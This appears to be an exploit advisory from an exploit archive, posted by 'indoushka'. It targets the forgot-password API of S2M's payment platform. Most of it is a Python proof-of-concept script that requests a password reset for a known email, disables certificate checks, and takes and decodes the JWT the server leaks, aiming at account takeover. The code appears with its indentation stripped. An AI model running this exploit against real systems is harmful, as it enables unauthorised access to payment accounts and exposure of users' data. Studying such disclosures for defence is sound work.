Share
## https://sploitus.com/exploit?id=PACKETSTORM:220754
==================================================================================================================================
    | # Title     : S2M JWT Token Exposure API Forgot Password Endpoint Vulnerability                                                |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://s2mworldwide.com/en/                                                                                     |
    ==================================================================================================================================
    
    [+] Summary    : This Python script demonstrates a security assessment targeting a forgot-password API endpoint in a digital payment platform operated by S2M, 
                     a company specializing in secure electronic transactions and payment processing solutions.
                     The script sends a crafted POST request using a known email address and attempts to retrieve a JWT (JSON Web Token) directly from the server response without proper verification.
    
    [+] If successful, the script:
    
    Extracts and displays the full JWT token
    Decodes the token payload (base64)
    Parses and prints sensitive information, including:
    User-related data
    Account status (userStatus)
    Token expiration time (exp)
    
    [+] Security Impact:
    This behavior indicates a critical vulnerability in the authentication flow. If an attacker can obtain valid JWT tokens without proper identity verification, it may lead to:
    
    [+] Account Takeover 
    Sensitive Information Disclosure
    Weak Password Reset Mechanism
    
    [+] POC   :  
    
    
    import requests
    import urllib3
    import json
    import base64
    
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    BASE_URL = "https://127.0.0.1/path/api/merchant/auth"
    EMAIL = "admin@indoushka.dz"
    
    def decode_jwt_payload(token):
    
    "Decode the middle part of the JWT to display the data"
    
    try:
    
    parts = token.split('.')
    
    if len(parts) != 3:
    
    return "Invalid token format"
    
    payload = parts[1]
    
    payload += '=' * (-len(payload) % 4)
    
    decoded = base64.b64decode(payload).decode('utf-8')
    
    return json.loads(decoded)
    
    except Exception as e:
    
    return f"Token content extraction failed: {e}"
    
    def get_full_token():
    
    session = requests.Session()
    
    session.headers.update({
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    
    "Content-Type": "application/json"
    
    })
    
    try:
    
    print(f"[*] Extracting full account token: {EMAIL}")
    
    res = session.post(f"{BASE_URL}/forgot-password", json={"email": EMAIL}, verify=False)
    
    data = res.json()
    
    token = data.get('token')
    
    status = data.get('userStatus')
    
    if token:
    
    print("\n" + "="*30 + " Full token (JWT) " + "="*30)
    
    print(token)
    
    print("="*81 + "\n")
    
    
    print("[*] Token Content Parsing (Decoded Payload):")
    
    payload_info = decode_jwt_payload(token)
    
    print(json.dumps(payload_info, indent=4, ensure_ascii=False))
    
    
    print(f"\n[!] Current User Status: {status}")
    
    
    if 'exp' in payload_info:
    
    from datetime import datetime
    
    exp_date = datetime.fromtimestamp(payload_info['exp'])
    
    print(f"[!] Token valid until: {exp_date}")
    
    else:
    
    print("[-] No token found in server response.")
    
    print(f"[*] Full response: {data}")
    
    except Exception as e:
    
    print(f"[X] Error: {e}")
    
    if __name__ == "__main__": 
    get_full_token()
    
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================